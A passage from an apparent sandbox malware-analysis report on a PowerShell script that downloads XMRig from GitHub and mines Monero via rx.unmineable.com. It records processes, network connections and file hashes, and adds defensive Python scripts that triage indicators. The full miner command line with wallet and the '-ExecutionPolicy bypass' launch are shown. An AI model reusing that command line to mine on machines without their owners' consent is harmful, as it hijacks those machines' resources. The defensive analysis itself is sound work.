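    r"^(?P<cc>[A-Z]{2}) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?: (?P<domain>\S+))? (?P<proto>tcp|udp)$"
)

# Hosts the miner was fetched through, inferred from the dropped xmrig-6.21.3 directory
# (an upstream release layout); the report itself does not show the download URL.
STAGING_SUFFIXES = ("github.com", "githubusercontent.com")


def parse_rows(text):
    """One dict per row; raise on anything that is not a report row."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError("unrecognised row: " + line)
        row = m.groupdict()
        row["port"] = int(row["port"])
        rows.append(row)
    return rows


def ptr_to_ip(name):
    """'215.156.26.20.in-addr.arpa' -> '20.26.156.215'; None for any other name."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def triage(rows, pool_host):
    """Bucket connections by role and tie PTR lookups back to the connections they describe."""
    out = {"staging": [], "pool": [], "unattributed": [],
           "forward_lookups": [], "ptr_confirmed": [], "ptr_background": []}
    connections = [r for r in rows if r["port"] != 53]
    connected_ips = {r["ip"] for r in connections}
    for r in connections:
        dom = r["domain"] or ""
        entry = f'{r["ip"]}:{r["port"]} {dom}'.rstrip()
        if dom and any(dom == s or dom.endswith("." + s) for s in STAGING_SUFFIXES):
            out["staging"].append(entry)
        elif dom == pool_host:
            out["pool"].append(entry)
        else:
            out["unattributed"].append(entry)
    for r in rows:
        if r["port"] != 53 or not r["domain"]:
            continue
        ip = ptr_to_ip(r["domain"])
        if ip is None:
            out["forward_lookups"].append(r["domain"])
        elif ip in connected_ips:
            out["ptr_confirmed"].append(ip)  # sandbox resolving the peer it just connected to
        else:
            out["ptr_background"].append(ip)  # no connection in the table: VM/OS background traffic
    return out


if __name__ == "__main__":
    for bucket, items in triage(parse_rows(NETWORK_ROWS), "rx.unmineable.com").items():
        print(bucket, items)
```

Only the pool and staging buckets are worth turning into blocklist entries; the four background addresses decoded from PTR names (2.21.189.164, 20.189.173.18, 199.232.210.172, 23.14.90.91) never receive a connection in this run and would only generate false positives if exported as indicators.
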

Files

memory/308-3-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp

memory/308-5-0x000001973F0A0000-0x000001973F0C2000-memory.dmp

memory/308-9-0x000001973F250000-0x000001973F2C6000-memory.dmp

memory/308-8-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/308-18-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hli1rsun.ivn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/308-25-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/308-48-0x000001973F230000-0x000001973F242000-memory.dmp

memory/308-61-0x000001973F220000-0x000001973F22A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4304-90-0x0000025DB1B90000-0x0000025DB1BB0000-memory.dmp

memory/4304-91-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/308-92-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/4304-93-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/308-94-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp

memory/308-95-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/308-96-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/4304-97-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-98-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-99-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-100-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-101-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-102-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-103-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-104-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-105-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-106-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-107-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-108-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-109-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-110-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-111-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-112-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-113-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-114-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-115-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-116-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-117-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-118-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-119-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-120-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-121-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-122-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-123-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-124-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-125-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-126-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-127-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-128-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-129-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-130-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-131-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-132-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-133-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-134-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-135-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-136-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-137-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-138-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-139-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-140-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-141-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-142-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-143-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-144-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-145-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-146-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-147-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-148-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-149-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-150-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-151-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-152-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-153-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-154-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-155-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-156-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-157-0x00007FF61F920000-0x00007FF620553000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:47

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows: no description, indicator, process or target was recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1208-0-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qvhx0n2.llq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1208-9-0x0000029F31230000-0x0000029F31252000-memory.dmp

memory/1208-10-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/1208-11-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/1208-12-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/1208-14-0x0000029F49820000-0x0000029F49832000-memory.dmp

memory/1208-15-0x0000029F312C0000-0x0000029F312CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4848-46-0x000001847FCB0000-0x000001847FCD0000-memory.dmp

memory/4848-47-0x0000018411B10000-0x0000018411B30000-memory.dmp

memory/4848-48-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-51-0x0000018411F50000-0x0000018411F70000-memory.dmp

memory/4848-50-0x0000018412180000-0x00000184121A0000-memory.dmp

memory/1208-49-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4848-52-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/1208-53-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

memory/4848-54-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-55-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-56-0x0000018412180000-0x00000184121A0000-memory.dmp

memory/4848-57-0x0000018411F50000-0x0000018411F70000-memory.dmp

memory/4848-58-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-59-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-60-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-61-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-62-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-63-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-64-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-65-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-66-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-67-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-68-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-69-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-70-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-71-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-72-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-73-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-74-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-75-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-76-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-77-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-78-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-79-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-80-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-81-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-82-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-83-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-84-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-85-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-86-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-87-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-88-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-89-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-90-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-91-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-92-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-93-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-94-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-95-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-96-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-97-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-98-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-99-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-100-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-101-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-102-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-103-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-104-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-105-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-106-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-107-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-108-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-109-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-110-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-111-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-112-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-113-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-114-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-115-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-116-0x00007FF782760000-0x00007FF783393000-memory.dmp
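
The Files sections list two kinds of dropped files. `__PSScriptPolicyTest_<random>.ps1` in %TEMP% is written by PowerShell itself when it checks whether AppLocker/WDAC script enforcement applies; the hashes reported for it in the win10 runs (MD5 c4ca4238..., SHA1 356a192b..., SHA256 6b86b273...) are the digests of the single byte `1`, so it is interpreter noise, not the sample's code. The win11 runs record a different digest for that file, which the check below leaves as unidentified rather than guessing. The real indicator is xmrig.exe, which has the same hashes in every run that reached it. The Python below is an added example written for this report, not part of the sandbox: it parses path/hash entries copied from the behavioral22 and behavioral20 Files sections above (memory dump lines omitted), sanity-checks digest lengths, separates PowerShell's probe files from payloads, and deduplicates payloads by SHA256.

```python
import hashlib
import re

# Dropped-file entries copied from the behavioral22 and behavioral20 Files sections.
FILES_TEXT = r"""
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hli1rsun.ivn.ps1
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qvhx0n2.llq.ps1
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
"""

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")
PATH_LINE = re.compile(r"^[A-Za-z]:\\")
POLICY_PROBE_NAME = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$")

# PowerShell writes a one-byte script "1" to %TEMP% to test whether AppLocker/WDAC
# script enforcement applies; hashing that byte reproduces the win10 entry above.
PROBE_SHA256 = hashlib.sha256(b"1").hexdigest()


def parse_files(text):
    """Group each path with the hash lines that follow it; reject malformed digests."""
    entries, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if PATH_LINE.match(line):
            current = {"path": line, "hashes": {}}
            entries.append(current)
            continue
        m = HASH_LINE.match(line)
        if not m or current is None:
            raise ValueError("unexpected line: " + line)
        algo, digest = m.groups()
        if len(digest) != DIGEST_LEN[algo]:
            raise ValueError(f"{algo} digest of wrong length in {current['path']}")
        current["hashes"][algo] = digest
    return entries


def classify(entries):
    """Split entries into PowerShell's own probe files and unique payloads keyed by SHA256."""
    probes, payloads = [], {}
    for e in entries:
        sha256 = e["hashes"].get("SHA256")
        if POLICY_PROBE_NAME.search(e["path"]):
            content = "one-byte marker '1'" if sha256 == PROBE_SHA256 else "content not identified"
            probes.append((e["path"], content))
        elif sha256 not in payloads:
            payloads[sha256] = {"path": e["path"], **e["hashes"]}
    return probes, payloads


if __name__ == "__main__":
    probes, payloads = classify(parse_files(FILES_TEXT))
    for path, content in probes:
        print("probe   ", path, content)
    for sha256, info in payloads.items():
        print("payload ", sha256, info["path"])
```

Keying the payload set on SHA256 collapses the four runs that reached the miner into a single indicator, and the digest-length check catches the copy-and-paste truncation that creeps in when hashes are lifted from a rendered report.
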

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows: no description, indicator, process or target was recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 tcp

Files

memory/3800-0-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i0ebnzo1.o54.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3800-9-0x0000027766920000-0x0000027766942000-memory.dmp

memory/3800-10-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3800-11-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3800-12-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3800-14-0x0000027766F40000-0x0000027766F52000-memory.dmp

memory/3800-15-0x0000027766F20000-0x0000027766F2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1676-46-0x00000166CB330000-0x00000166CB350000-memory.dmp

memory/1676-47-0x00000166CB390000-0x00000166CB3B0000-memory.dmp

memory/1676-48-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/3800-49-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3800-50-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

memory/3800-51-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/1676-54-0x00000166CB3B0000-0x00000166CB3D0000-memory.dmp

memory/1676-53-0x00000166CB3D0000-0x00000166CB3F0000-memory.dmp

memory/1676-52-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/3800-55-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/1676-56-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-57-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-58-0x00000166CB3D0000-0x00000166CB3F0000-memory.dmp

memory/1676-59-0x00000166CB3B0000-0x00000166CB3D0000-memory.dmp

memory/1676-60-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-61-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-62-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-63-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-64-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-65-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-66-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-67-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-68-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-69-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-70-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-71-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-72-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-73-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-74-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-75-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-76-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-77-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-78-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-79-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-80-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-81-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-82-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-83-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-84-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-85-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-86-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-87-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

